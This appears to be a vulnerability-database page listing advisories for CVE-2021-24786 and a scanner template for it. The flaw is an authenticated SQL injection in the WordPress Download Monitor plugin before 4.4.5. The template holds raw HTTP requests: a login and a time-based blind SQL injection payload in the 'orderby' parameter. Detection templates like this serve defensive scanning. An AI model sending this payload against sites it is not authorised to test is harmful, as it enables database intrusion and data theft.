| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Wordpress Download Monitor Plugin WordPress V 4.4.4 - SQL Injection (Authenticated) Exploit | 2 Feb 202200:00 | – | zdt | |
| CVE-2021-24786 | 3 Jan 202216:44 | – | circl | |
| WordPress plugin SQL注入漏洞 | 3 Jan 202200:00 | – | cnnvd | |
| WordPress Download Monitor PluginSQL Injection Vulnerability | 6 Jan 202200:00 | – | cnvd | |
| CVE-2021-24786 | 3 Jan 202212:49 | – | cve | |
| CVE-2021-24786 Download Monitor < 4.4.5 - Admin+ SQL Injection | 3 Jan 202212:49 | – | cvelist | |
| Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated) | 2 Feb 202200:00 | – | exploitdb | |
| EUVD-2021-11698 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-24786 | 3 Jan 202213:15 | – | nvd | |
| WordPress Download Monitor Plugin < 4.4.5 SQLi Vulnerability | 18 Jan 202200:00 | – | openvas |
id: CVE-2021-24786
info:
name: Download Monitor < 4.4.5 - SQL Injection
author: MrHarsh
severity: high
description: |
The Download Monitor plugin for WordPress is vulnerable to SQL injection via the 'orderby' parameter in versions before 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with administrator-level permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
remediation: |
Update to version 4.4.5 or later.
reference:
- https://wpscan.com/vulnerability/a6571f16-66d2-449e-af83-1c6ddd56edfa
- https://plugins.trac.wordpress.org/changeset/2610899/download-monitor
- https://nvd.nist.gov/vuln/detail/CVE-2021-24786
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-24786
cwe-id: CWE-89
epss-score: 0.17484
epss-percentile: 0.96764
cpe: cpe:2.3:a:download_monitor_project:download_monitor:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: download_monitor_project
product: download_monitor
framework: wordpress
publicwww-query: "/wp-content/plugins/download-monitor/"
tags: cve,cve2021,wordpress,wp-plugin,sqli,download-monitor,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 30s
GET /wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`+and+(select+sleep(8))+and+`user_id=user_id HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_2, "dlm_product")'
- 'status_code_2 == 200'
- 'duration_2 >= 8'
condition: and
# digest: 4a0a00473045022100a7c1bcc2e00a28f0a8d846ee2219ffa83b2ceac8384b52e804290445768441b9022005b03254822af37860bcd553370d17d2c4dd31810c8c818db003bd9768fe02a8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation